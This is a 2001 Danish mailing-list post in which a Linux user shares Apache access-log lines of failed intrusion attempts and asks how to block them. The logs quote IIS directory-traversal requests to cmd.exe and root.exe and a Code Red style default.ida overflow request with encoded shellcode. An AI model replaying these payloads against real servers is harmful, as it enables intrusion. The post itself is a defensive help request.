sslug-teknik team mailing list archive

Thread
Date

Hakker wannabees

To: sslug-teknik@xxxxxxxx
From: Robert Larsen <robert@xxxxxxxxxxxxxxxxx>
Date: Mon, 24 Sep 2001 17:54:39 +0200
Delivered-to: mailing list sslug-teknik@xxxxxxxx
Mailing-list: contact sslug-teknik-help@xxxxxxxx; run by ezmlm
Sender: robert@xxxxxxxxxxxxxxxxxxxxxxxxx

Hello

Jeg har inden for de sidste 24 timer modtaget et par indbrudsforsøg fra
knap 20 forskellige IP adresser. Alle bruger ca. de samme exploits som
sjovt nok er en Microsoft ting og ikke vil kunne ramme mig. Det er med
andre ord ikke Kevin Mitnick jeg har med at gøre.
Det er dog temmelig irriterende. Kan man sætte sin firewall op til at
afvise forsøgene eller i det mindste sætte Apache til at sende dem en
HTML/PHP side med en advarsel ?
Andre forslag ?
Underligt at der kommer så mange forsøg med samme teknik på samme tid !!

Følgende er et par linjer fra min access log:

212.217.79.226 - - [24/Sep/2001:09:18:26 +0200] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 292
212.217.79.226 - - [24/Sep/2001:09:18:30 +0200] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 290
212.217.79.226 - - [24/Sep/2001:09:18:34 +0200] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
212.217.79.226 - - [24/Sep/2001:09:18:38 +0200] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
212.217.79.226 - - [24/Sep/2001:09:18:42 +0200] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
212.217.79.226 - - [24/Sep/2001:09:18:43 +0200] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 331
212.217.79.226 - - [24/Sep/2001:09:18:47 +0200] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 331
212.217.79.226 - - [24/Sep/2001:09:18:48 +0200] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 347
212.217.79.226 - - [24/Sep/2001:09:18:52 +0200] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
212.217.79.226 - - [24/Sep/2001:09:19:05 +0200] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
212.217.79.226 - - [24/Sep/2001:09:19:07 +0200] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
212.217.79.226 - - [24/Sep/2001:09:19:08 +0200] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
212.217.79.226 - - [24/Sep/2001:09:19:12 +0200] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 297
212.217.79.226 - - [24/Sep/2001:09:19:15 +0200] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 297
212.217.79.226 - - [24/Sep/2001:09:19:19 +0200] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
212.217.79.226 - - [24/Sep/2001:09:19:23 +0200] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
212.158.24.240 - - [24/Sep/2001:09:33:17 +0200] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 404 287

Hvad ville I gøre i mit sted ?

Venlig hilsen
Robert

Follow ups

Re: Hakker wannabees
From: Mads Bondo Dydensborg, 2001-09-24
Re: Hakker wannabees
From: Jesper Hess Nielsen, 2001-09-24